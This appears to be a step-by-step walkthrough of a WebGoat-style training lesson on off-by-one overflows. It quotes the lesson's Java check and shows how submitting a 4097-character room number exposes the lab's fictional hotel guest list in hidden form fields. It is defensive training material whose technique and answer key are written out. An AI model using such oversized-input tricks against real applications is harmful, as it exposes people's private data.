Buffer-Overflow attack: Off-by-One Overflows Part 1

Off-by-One Overflow is the vulnerability due to programming error that with extra one or two bytes beyond an allowed buffer. 

Goal: 

Perform overflow attack to get the hotel client list with room info. 

Method: 

Try to use the off-by-one overflow vulnerability to perform overflow attack to collect client info 

Step by step Guide

1. From the resource code file OffByOne.java provided, we can see it has Off-by-One Overflow vulnerability. So we will overflow "param3" which is ROOM_NUMBER

 

 param3 = s.getParser().getStringParameter(ROOM_NUMBER, "");
        input = new Input(Input.HIDDEN, "c", param3);
        ec.addElement(input);
        ec.addElement("\r\n");

 

// And finally the check...

if(param3.length() > 4096)

{

ec.addElement(new Input(Input.hidden, "d", "Johnathan"));

ec.addElement("\r\n");

ec.addElement(new Input(Input.hidden, "e", "Ravern"));

ec.addElement("\r\n");

ec.addElement(new Input(Input.hidden, "f", "4321"));

ec.addElement("\r\n");

 

ec.addElement(new Input(Input.hidden, "g", "John"));

ec.addElement("\r\n");

ec.addElement(new Input(Input.hidden, "h", "Smith"));

ec.addElement("\r\n");

ec.addElement(new Input(Input.hidden, "i", "56"));

ec.addElement("\r\n");

 

ec.addElement(new Input(Input.hidden, "j", "Ana"));

ec.addElement("\r\n");

ec.addElement(new Input(Input.hidden, "k", "Arneta"));

ec.addElement("\r\n");

ec.addElement(new Input(Input.hidden, "l", "78"));

ec.addElement("\r\n");

 

ec.addElement(new Input(Input.hidden, "m", "Lewis"));

ec.addElement("\r\n");

ec.addElement(new Input(Input.hidden, "n", "Hamilton"));

ec.addElement("\r\n");

ec.addElement(new Input(Input.hidden, "o", "9901"));

ec.addElement("\r\n");

 

s.setMessage("To complete the lesson, restart lesson and enter VIP first/last name");

 

}


2. Now let's use character generator to generate a number length of 4097. There are couple of websites that you can use to generate the number.. 

https://www.randomlists.com/random-letters

http://dave-reed.com/Nifty/randSeq

3. Fill up the form with First/Last name and enter number just generated to Room number input field and click submit.

4. Now click on the next screen and Accept the Terms  

5. Now at the next page, F12 or right-click to open Firefox developer tools or Firebug. From the output you will find client info.

 

<form accept-charset="UNKNOWN" method="POST" name="form" action="#attack/736032128/600" enctype="">You have now completed the 2 step process and have access to the Internet<br><br>Process complete<br><br>Your connection will remain active for the time allocated for starting now.<br><br><table width="90%" cellspacing="0" cellpadding="2" border="0" align="center"><tbody><tr><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr></tbody></table>

<input name="a" value="Young" type="HIDDEN">

<input name="b" value="David" type="HIDDEN">

<input name="c" value="655311165472798415286699773267………7389893355" type="HIDDEN">

<input name="d" value="Johnathan" type="hidden">

<input name="e" value="Ravern" type="hidden">

<input name="f" value="4321" type="hidden">

<input name="g" value="John" type="hidden">

<input name="h" value="Smith" type="hidden">

<input name="i" value="56" type="hidden">

<input name="j" value="Ana" type="hidden">

<input name="k" value="Arneta" type="hidden">

<input name="l" value="78" type="hidden">

<input name="m" value="Lewis" type="hidden">

<input name="n" value="Hamilton" type="hidden">

<input name="o" value="9901" type="hidden">

<br><br>We would like to thank you for your payment.<br><br></form>

 

Name

Room#

Johnathan Ravern

4321

John Smith

56

Ana Arneta

78

Lewis Hamilton

9901

 

 

Please publish modules in offcanvas position.